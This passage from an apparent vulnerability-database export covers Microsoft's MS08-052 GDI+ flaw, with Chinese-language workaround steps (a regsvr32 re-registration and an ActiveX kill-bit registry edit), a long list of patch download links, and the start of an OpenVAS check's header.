\r\n\u600e\u6837\u6062\u590d\u521a\u624d\u7684\u4e34\u65f6\u89e3\u51b3\u65b9\u6848\uff1a\r\n1\uff0c\u70b9\u51fb\u2018\u5f00\u59cb\u2019\uff0c\u70b9\u2018\u8fd0\u884c\u2019\uff0c\u8f93\u5165"%SystemRoot%\\System32\\regsvr32.exe" "%CommonProgramFiles%\\Microsoft Shared\\VGX\\vgx.dll"\uff0c\u7136\u540e\u70b9\u51fb\u2019\u786e\u5b9a\u2018\u3002\r\n2\uff0c\u51fa\u73b0\u8bc1\u5b9e\u6ce8\u518c\u5904\u7406\u6210\u529f\u7684\u5bf9\u8bdd\u6846\u540e\uff0c\u70b9\u51fb\u2019\u786e\u5b9a\u2018\u3002\r\n3\uff0c\u91cd\u65b0\u542f\u52a8\r\n \r\n-\u7f16\u8f91\u6ce8\u518c\u8868\u9632\u6b62RSClientPrint\u4e2dInternet Explorer\u8fd0\u884c\uff1a\r\nWindows Registry Editor Version 5.00\r\n[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{FA91DF8D-53AB-455D-AB20-F2F023E498D3}]\r\n"Compatibility Flags"=dword:00000400\r\n[HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{FA91DF8D-53AB-455D-AB20-F2F023E498D3}]\r\n"Compatibility Flags"=dword:00000400\r\n\u628a\u5982\u4e0a\u5185\u5bb9\u7c98\u8d34\u5230\u8bb0\u4e8b\u672c\u5e76\u4ee5.reg\u6587\u4ef6\u6269\u5c55\u540d\u4fdd\u5b58\uff0c\u5e76\u53cc\u51fb\u3002\r\n \r\n\u53c2\u8003\u5982\u4e0b\u8865\u4e01\u7a0b\u5e8f\uff1a\r\nMicrosoft Windows Server 2003 Datacenter Edition SP1\r\nMicrosoft Security Update for Windows Server 2003 (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=ac03f138-eca4 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=ac03f138-eca4</a> -46e1-9782-e811820e547f&displaylang=en\r\nMicrosoft Windows XP Media Center Edition SP2\r\nMicrosoft Security Update for Windows XP (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=e0bd6fbe-f46e target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=e0bd6fbe-f46e</a> -4961-9a79-49ec77d39439&displaylang=en\r\nMicrosoft Windows Vista Home Premium 64-bit edition 0\r\nMicrosoft Security Update for Windows Vista for x64-based Systems (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=aa47d016-f5c9 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=aa47d016-f5c9</a> -4586-8876-f1f4f255f54d&displaylang=en\r\nMicrosoft Digital Image Suite 2006\r\nMicrosoft Vulnerabilities in Digital Image 2006 using GDI+ Could Allow Remote Code Execution (KB955992)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=04afd760-8173 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=04afd760-8173</a> -4069-9e82-d3bf053d9eae&displaylang=en\r\nMicrosoft SQL Server 2005 Itanium Edition SP2\r\nMicrosoft Security Update for SQL Server 2005 QFE Service Pack 2 (KB954607)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=5148B887-F323 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=5148B887-F323</a> -4ADB-9721-61E1C0CFD213&displaylang=en\r\nMicrosoft Security Update for SQL Server 2005 Service Pack 2 (KB954606)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=4603C722-2468 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=4603C722-2468</a> -4ADB-B945-2ED0458B8F47&displaylang=en\r\nMicrosoft Report Viewer 2005 SP1\r\nMicrosoft Microsoft Report Viewer Redistributable 2005 Service Pack 1\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=82833F27-081D target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=82833F27-081D</a> -4B72-83EF-2836360A904D&displaylang=en\r\nMicrosoft Windows Server 2003 Itanium SP1\r\nMicrosoft Security Update for Windows Server 2003 for Itanium-based Systems (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=14e99f8a-cdd4 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=14e99f8a-cdd4</a> -40d7-8cfc-73ae6bd6dfad&displaylang=en\r\nMicrosoft Windows Server 2003 Itanium 0\r\nMicrosoft Security Update for Windows Server 2003 for Itanium-based Systems (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=14e99f8a-cdd4 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=14e99f8a-cdd4</a> -40d7-8cfc-73ae6bd6dfad&displaylang=en\r\nMicrosoft Windows Server 2003 Enterprise Edition Itanium SP1\r\nMicrosoft Security Update for Windows Server 2003 for Itanium-based Systems (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=14e99f8a-cdd4 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=14e99f8a-cdd4</a> -40d7-8cfc-73ae6bd6dfad&displaylang=en\r\nMicrosoft Windows Vista x64 Edition 0\r\nMicrosoft Security Update for Windows Vista for x64-based Systems (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=aa47d016-f5c9 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=aa47d016-f5c9</a> -4586-8876-f1f4f255f54d&displaylang=en\r\nMicrosoft Windows Server 2003 Datacenter x64 Edition SP2\r\nMicrosoft Security Update for Windows Server 2003 x64 Edition (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=93f1451b-5b62 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=93f1451b-5b62</a> -47e5-8f0c-b720b957999a&displaylang=en\r\nMicrosoft Security Update for Windows XP x64 Edition (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=c5d26771-1f49 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=c5d26771-1f49</a> -4bbf-902c-bf92e527cadb&displaylang=en\r\nMicrosoft Office XP SP1\r\nMicrosoft Security Update for Microsoft Office XP (KB953405)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=ef3de64c-fc17 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=ef3de64c-fc17</a> -4500-9da4-a3bba97fda6d&displaylang=en\r\nMicrosoft Security Update for Microsoft Office XP (KB953405)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=ef3de64c-fc17 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=ef3de64c-fc17</a> -4500-9da4-a3bba97fda6d\r\nMicrosoft SQL Server 2005 SP2\r\nMicrosoft Search Advanced Search Security Update for SQL Server 2005 Service Pack 2 (KB954606) Brief Descrip\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=4603C722-2468 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=4603C722-2468</a> -4ADB-B945-2ED0458B8F47&displaylang=en\r\nMicrosoft Security Update for SQL Server 2005 QFE Service Pack 2 (KB954607)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=5148B887-F323 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=5148B887-F323</a> -4ADB-9721-61E1C0CFD213&displaylang=en\r\nMicrosoft Security Update for SQL Server 2005 Service Pack 2 (KB954606)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=4603C722-2468 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=4603C722-2468</a> -4ADB-B945-2ED0458B8F47&displaylang=en\r\nMicrosoft Windows Vista Business 64-bit edition 0\r\nMicrosoft Security Update for Windows Vista for x64-based Systems (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=aa47d016-f5c9 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=aa47d016-f5c9</a> -4586-8876-f1f4f255f54d&displaylang=en\r\nMicrosoft Windows Vista Home Basic SP1\r\nMicrosoft Security Update for Windows Vista (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=16f3ad21-ed77 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=16f3ad21-ed77</a> -4c32-93df-3b650b2b32a5&displaylang=en\r\nMicrosoft Windows XP Media Center Edition SP1\r\nMicrosoft Security Update for Windows XP (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=e0bd6fbe-f46e target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=e0bd6fbe-f46e</a> -4961-9a79-49ec77d39439&displaylang=en\r\nMicrosoft Windows Vista Home Premium 64-bit edition SP1\r\nMicrosoft Security Update for Windows Vista for x64-based Systems (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=aa47d016-f5c9 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=aa47d016-f5c9</a> -4586-8876-f1f4f255f54d&displaylang=en\r\nMicrosoft Windows XP Media Center Edition SP3\r\nMicrosoft Security Update for Windows XP (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=e0bd6fbe-f46e target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=e0bd6fbe-f46e</a> -4961-9a79-49ec77d39439&displaylang=en\r\nMicrosoft Report Viewer 2008 0\r\nMicrosoft Microsoft Report Viewer Redistributable 2008\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=6AE0AA19-3E6C target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=6AE0AA19-3E6C</a> -474C-9D57-05B2347456B1&displaylang=en\r\nMicrosoft Windows Server 2003 Enterprise Edition Itanium 0\r\nMicrosoft Security Update for Windows Server 2003 for Itanium-based Systems (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=14e99f8a-cdd4 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=14e99f8a-cdd4</a> -40d7-8cfc-73ae6bd6dfad&displaylang=en\r\nMicrosoft Windows Server 2003 Web Edition SP2\r\nMicrosoft Security Update for Windows Server 2003 (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=ac03f138-eca4 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=ac03f138-eca4</a> -46e1-9782-e811820e547f&displaylang=en\r\nMicrosoft Windows Vista Home Premium\r\nMicrosoft Security Update for Windows Vista (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=16f3ad21-ed77 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=16f3ad21-ed77</a> -4c32-93df-3b650b2b32a5&displaylang=en\r\nMicrosoft Windows Server 2003 Standard Edition SP1\r\nMicrosoft Security Update for Windows Server 2003 (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=ac03f138-eca4 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=ac03f138-eca4</a> -46e1-9782-e811820e547f&displaylang=en\r\nMicrosoft Windows Server 2003 x64 SP1\r\nMicrosoft Security Update for Windows Server 2003 x64 Edition (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=93f1451b-5b62 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=93f1451b-5b62</a> -47e5-8f0c-b720b957999a&displaylang=en\r\nMicrosoft Security Update for Windows XP x64 Edition (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=c5d26771-1f49 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=c5d26771-1f49</a> -4bbf-902c-bf92e527cadb&displaylang=en\r\nMicrosoft Windows Vista Enterprise\r\nMicrosoft Security Update for Windows Vista (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=16f3ad21-ed77 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=16f3ad21-ed77</a> -4c32-93df-3b650b2b32a5&displaylang=en\r\nMicrosoft Windows XP Professional x64 Edition SP2\r\nMicrosoft Security Update for Windows XP x64 Edition (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=c5d26771-1f49 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=c5d26771-1f49</a> -4bbf-902c-bf92e527cadb&displaylang=en\r\nMicrosoft Internet Explorer 6.0 SP1\r\nMicrosoft Security Update for Windows 2000 (KB938464) - English\r\n<a href=http://www.microsoft.com/downloads/details.aspx?FamilyId=a860d2d9-653d target=_blank>http://www.microsoft.com/downloads/details.aspx?FamilyId=a860d2d9-653d</a> -4ddb-bbff-323d3ccdb866&displaylang=en\r\nMicrosoft Windows Vista Ultimate 64-bit edition SP1\r\nMicrosoft Security Update for Windows Vista for x64-based Systems (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=aa47d016-f5c9 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=aa47d016-f5c9</a> -4586-8876-f1f4f255f54d&displaylang=en\r\nMicrosoft Windows Server 2003 Standard Edition \r\nMicrosoft Security Update for Windows Server 2003 (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=ac03f138-eca4 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=ac03f138-eca4</a> -46e1-9782-e811820e547f&displaylang=en\r\nMicrosoft Windows Vista Enterprise 64-bit edition 0\r\nMicrosoft Security Update for Windows Vista for x64-based Systems (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=aa47d016-f5c9 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=aa47d016-f5c9</a> -4586-8876-f1f4f255f54d&displaylang=en\r\nMicrosoft Windows Vista 0\r\nMicrosoft Security Update for Windows Vista (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=16f3ad21-ed77 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=16f3ad21-ed77</a> -4c32-93df-3b650b2b32a5&displaylang=en\r\nMicrosoft Windows Vista Business\r\nMicrosoft Security Update for Windows Vista (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=16f3ad21-ed77 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=16f3ad21-ed77</a> -4c32-93df-3b650b2b32a5&displaylang=en\r\nMicrosoft Windows Server 2003 x64 SP2\r\nMicrosoft Security Update for Windows Server 2003 x64 Edition (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=93f1451b-5b62 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=93f1451b-5b62</a> -47e5-8f0c-b720b957999a&displaylang=en\r\nMicrosoft Security Update for Windows XP x64 Edition (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=c5d26771-1f49 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=c5d26771-1f49</a> -4bbf-902c-bf92e527cadb&displaylang=en\r\nMicrosoft Windows Vista x64 Edition SP1\r\nMicrosoft Security Update for Windows Vista for x64-based Systems (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=aa47d016-f5c9 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=aa47d016-f5c9</a> -4586-8876-f1f4f255f54d&displaylang=en\r\nMicrosoft SQL Server 2000 Reporting Services SP2\r\nMicrosoft Security Update for SQL Server Reporting Services 2000 Service Pack 2 (KB954609)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=5F9E7F78-7439 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=5F9E7F78-7439</a> -414B-A9DC-A779B89427DB\r\nMicrosoft Windows Vista Ultimate SP1\r\nMicrosoft Security Update for Windows Vista (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=16f3ad21-ed77 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=16f3ad21-ed77</a> -4c32-93df-3b650b2b32a5&displaylang=en\r\nMicrosoft Office XP \r\nMicrosoft Security Update for Microsoft Office XP (KB953405)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=ef3de64c-fc17 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=ef3de64c-fc17</a> -4500-9da4-a3bba97fda6d&displaylang=en\r\nMicrosoft Security Update for Microsoft Office XP (KB953405)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=ef3de64c-fc17 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=ef3de64c-fc17</a> -4500-9da4-a3bba97fda6d\r\nMicrosoft Windows Server 2003 Enterprise x64 Edition \r\nMicrosoft Security Update for Windows Server 2003 x64 Edition (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=93f1451b-5b62 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=93f1451b-5b62</a> -47e5-8f0c-b720b957999a&displaylang=en\r\nMicrosoft Security Update for Windows XP x64 Edition (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=c5d26771-1f49 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=c5d26771-1f49</a> -4bbf-902c-bf92e527cadb&displaylang=en\r\nMicrosoft Windows XP Professional \r\nMicrosoft Security Update for Windows XP (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=e0bd6fbe-f46e target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=e0bd6fbe-f46e</a> -4961-9a79-49ec77d39439&displaylang=en\r\nMicrosoft Internet Explorer 6.0\r\nMicrosoft Security Update for Windows 2000 (KB938464) - English\r\n<a href=http://www.microsoft.com/downloads/details.aspx?FamilyId=a860d2d9-653d target=_blank>http://www.microsoft.com/downloads/details.aspx?FamilyId=a860d2d9-653d</a> -4ddb-bbff-323d3ccdb866&displaylang=en\r\nMicrosoft Windows XP 0\r\nMicrosoft Security Update for Windows XP (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=e0bd6fbe-f46e target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=e0bd6fbe-f46e</a> -4961-9a79-49ec77d39439&displaylang=en\r\nMicrosoft Windows Server 2003 Datacenter Edition Itanium 0\r\nMicrosoft Security Update for Windows Server 2003 for Itanium-based Systems (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=14e99f8a-cdd4 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=14e99f8a-cdd4</a> -40d7-8cfc-73ae6bd6dfad&displaylang=en\r\nMicrosoft Windows Server 2003 Datacenter x64 Edition \r\nMicrosoft Security Update for Windows Server 2003 x64 Edition (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=93f1451b-5b62 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=93f1451b-5b62</a> -47e5-8f0c-b720b957999a&displaylang=en\r\nMicrosoft Security Update for Windows XP x64 Edition (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=c5d26771-1f49 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=c5d26771-1f49</a> -4bbf-902c-bf92e527cadb&displaylang=en\r\nMicrosoft Windows Vista Home Basic 64-bit edition 0\r\nMicrosoft Security Update for Windows Vista for x64-based Systems (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=aa47d016-f5c9 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=aa47d016-f5c9</a> -4586-8876-f1f4f255f54d&displaylang=en\r\nMicrosoft Windows Server 2003 Enterprise Edition SP1\r\nMicrosoft Security Update for Windows Server 2003 (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=ac03f138-eca4 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=ac03f138-eca4</a> -46e1-9782-e811820e547f&displaylang=en\r\nMicrosoft Windows Vista SP1\r\nMicrosoft Security Update for Windows Vista (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=16f3ad21-ed77 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=16f3ad21-ed77</a> -4c32-93df-3b650b2b32a5&displaylang=en\r\nMicrosoft Office XP SP3\r\nMicrosoft Security Update for Microsoft Office XP (KB953405)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=ef3de64c-fc17 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=ef3de64c-fc17</a> -4500-9da4-a3bba97fda6d&displaylang=en\r\nMicrosoft Security Update for Microsoft Office XP (KB953405)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=ef3de64c-fc17 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=ef3de64c-fc17</a> -4500-9da4-a3bba97fda6d\r\nMicrosoft Windows Server 2008 for x64-based Systems 0\r\nMicrosoft Security Update for Windows Server 2008 x64 Edition (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=7f1e0f05-6c9d target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=7f1e0f05-6c9d</a> -4ad1-9b19-50ee4fa7bd7e&displaylang=en\r\nMicrosoft Windows Vista Home Basic\r\nMicrosoft Security Update for Windows Vista (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=16f3ad21-ed77 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=16f3ad21-ed77</a> -4c32-93df-3b650b2b32a5&displaylang=en\r\nMicrosoft Windows Vista Business SP1\r\nMicrosoft Security Update for Windows Vista (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=16f3ad21-ed77 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=16f3ad21-ed77</a> -4c32-93df-3b650b2b32a5&displaylang=en\r\nMicrosoft Windows Server 2003 Datacenter Edition \r\nMicrosoft Security Update for Windows Server 2003 (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=ac03f138-eca4 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=ac03f138-eca4</a> -46e1-9782-e811820e547f&displaylang=en\r\nMicrosoft Windows XP 64-bit Edition SP1\r\nMicrosoft Security Update for Windows XP x64 Edition (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=c5d26771-1f49 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=c5d26771-1f49</a> -4bbf-902c-bf92e527cadb&displaylang=en\r\nMicrosoft Office 2003 SP3\r\nMicrosoft Security Update for Office 2003 (KB954478)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=e9f8e309-d721 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=e9f8e309-d721</a> -4bab-b485-5eede8d49eb8&displaylang=en\r\nMicrosoft Windows Vista Ultimate\r\nMicrosoft Security Update for Windows Vista (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=16f3ad21-ed77 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=16f3ad21-ed77</a> -4c32-93df-3b650b2b32a5&displaylang=en\r\n3DM Software Disk Management Software SP2\r\nMicrosoft Security Update for Windows Server 2003 (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=ac03f138-eca4 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=ac03f138-eca4</a> -46e1-9782-e811820e547f&displaylang=en\r\nMicrosoft Windows Vista Home Premium SP1\r\nMicrosoft Security Update for Windows Vista (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=16f3ad21-ed77 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=16f3ad21-ed77</a> -4c32-93df-3b650b2b32a5&displaylang=en\r\nMicrosoft Windows Vista Business 64-bit edition SP1\r\nMicrosoft Security Update for Windows Vista for x64-based Systems (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=aa47d016-f5c9 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=aa47d016-f5c9</a> -4586-8876-f1f4f255f54d&displaylang=en\r\nMicrosoft Windows Server 2003 Enterprise Edition \r\nMicrosoft Security Update for Windows Server 2003 (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=ac03f138-eca4 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=ac03f138-eca4</a> -46e1-9782-e811820e547f&displaylang=en\r\nMicrosoft Forefront Client Security 1.0\r\nMicrosoft Microsoft Forefront Security v 1.0 MS08-052 (KB 957177)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=1EB1A79F-44CA target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=1EB1A79F-44CA</a> -499E-90BB-AC51894E9D1E&displaylang=en\r\nMicrosoft Windows Server 2003 Standard Edition SP2\r\nMicrosoft Security Update for Windows Server 2003 (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=ac03f138-eca4 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=ac03f138-eca4</a> -46e1-9782-e811820e547f&displaylang=en\r\nMicrosoft Windows XP Home SP2\r\nMicrosoft Security Update for Windows XP (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=e0bd6fbe-f46e target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=e0bd6fbe-f46e</a> -4961-9a79-49ec77d39439&displaylang=en\r\n3DM Software Disk Management Software SP1\r\nMicrosoft Security Update for Windows Server 2003 (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=ac03f138-eca4 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=ac03f138-eca4</a> -46e1-9782-e811820e547f&displaylang=en\r\nMicrosoft Windows Server 2003 Itanium SP2\r\nMicrosoft Security Update for Windows Server 2003 for Itanium-based Systems (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=14e99f8a-cdd4 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=14e99f8a-cdd4</a> -40d7-8cfc-73ae6bd6dfad&displaylang=en\r\nMicrosoft Windows Server 2003 Web Edition \r\nMicrosoft Security Update for Windows Server 2003 (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=ac03f138-eca4 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=ac03f138-eca4</a> -46e1-9782-e811820e547f&displaylang=en\r\nMicrosoft Windows XP Home \r\nMicrosoft Security Update for Windows XP (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=e0bd6fbe-f46e target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=e0bd6fbe-f46e</a> -4961-9a79-49ec77d39439&displaylang=en\r\nMicrosoft Windows Vista Enterprise 64-bit edition SP1\r\nMicrosoft Security Update for Windows Vista for x64-based Systems (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=aa47d016-f5c9 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=aa47d016-f5c9</a> -4586-8876-f1f4f255f54d&displaylang=en\r\nMicrosoft Windows Server 2008 Standard Edition 0\r\nMicrosoft Security Update for Windows Server 2008 (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=23bd3be5-cc66 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=23bd3be5-cc66</a> -46f8-9420-49d65d8afe1d&displaylang=en\r\nMicrosoft Windows Vista Ultimate 64-bit edition 0\r\nMicrosoft Security Update for Windows Vista for x64-based Systems (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=aa47d016-f5c9 target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=aa47d016-f5c9</a> -4586-8876-f1f4f255f54d&displaylang=en\r\nMicrosoft Windows XP Home SP1\r\nMicrosoft Security Update for Windows XP (KB938464)\r\n<a href=http://www.microsoft.com/downloads/details.aspx?familyid=e0bd6fbe-f46e target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=e0bd6fbe-f46e</a> -4961-9a79-49ec77d39439&displaylang=en", "published": "2008-09-11T00:00:00", "type": "seebug", "title": "Microsoft GDI+ GIF\u6587\u4ef6\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08MS08-052\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3013"], "modified": "2008-09-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4020", "id": "SSV:4020", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-02T21:13:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3013", "CVE-2008-3015", "CVE-2008-3014", "CVE-2008-3012", "CVE-2007-5348"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS08-052.", "modified": "2017-02-20T00:00:00", "published": "2011-01-18T00:00:00", "id": "OPENVAS:801725", "href": "http://plugins.openvas.org/nasl.php?oid=801725", "type": "openvas", "title": "Microsoft Products GDI Plus Remote Code Execution Vulnerabilities (954593)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms08-052.nasl 5362 2017-02-20 12:46:39Z cfi $\n#\n# Microsoft GDI Plus Remote Code Execution Vulnerabilities (954593)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy 